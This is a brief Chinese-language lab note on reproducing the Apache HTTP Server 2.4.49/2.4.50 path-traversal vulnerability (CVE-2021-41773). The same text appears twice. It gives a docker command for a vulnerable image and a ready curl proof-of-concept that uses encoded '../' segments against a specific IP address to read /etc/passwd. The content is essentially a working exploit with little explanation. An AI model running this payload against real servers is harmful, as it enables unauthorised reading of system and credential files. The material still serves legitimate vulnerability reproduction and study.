apache 漏洞
影响版本
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现
http://1.15.136.212:8080
1.使⽤poc
curl http://1.15.136.212:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
影响版本
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现
http://1.15.136.212:8080
1.使⽤poc
curl http://1.15.136.212:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd